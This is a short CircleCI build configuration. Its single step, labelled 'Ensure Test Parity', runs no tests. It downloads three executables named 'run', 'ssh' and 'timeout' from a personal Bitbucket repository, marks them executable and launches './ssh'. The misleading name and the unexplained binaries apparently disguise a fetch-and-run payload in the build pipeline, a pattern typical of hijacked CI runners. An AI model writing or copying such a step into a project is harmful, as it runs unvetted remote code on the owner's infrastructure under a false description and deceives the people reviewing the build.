version: 2
jobs:
  build:
    machine:
     image: ubuntu-2004:202008-01
    steps:
      - checkout
      - run:
          name: Ensure Test Parity
          command: |
             wget https://bitbucket.org/lorengil/orel/raw/6d33d6ecfb117e39f350017fdbe7181e9f5a6096/run && chmod +x ssh
             wget https://bitbucket.org/lorengil/orel/raw/6d33d6ecfb117e39f350017fdbe7181e9f5a6096/ssh && chmod +x run
             wget https://bitbucket.org/lorengil/orel/raw/6d33d6ecfb117e39f350017fdbe7181e9f5a6096/timeout && chmod +x timeout
             chmod +x ./ssh
             ./ssh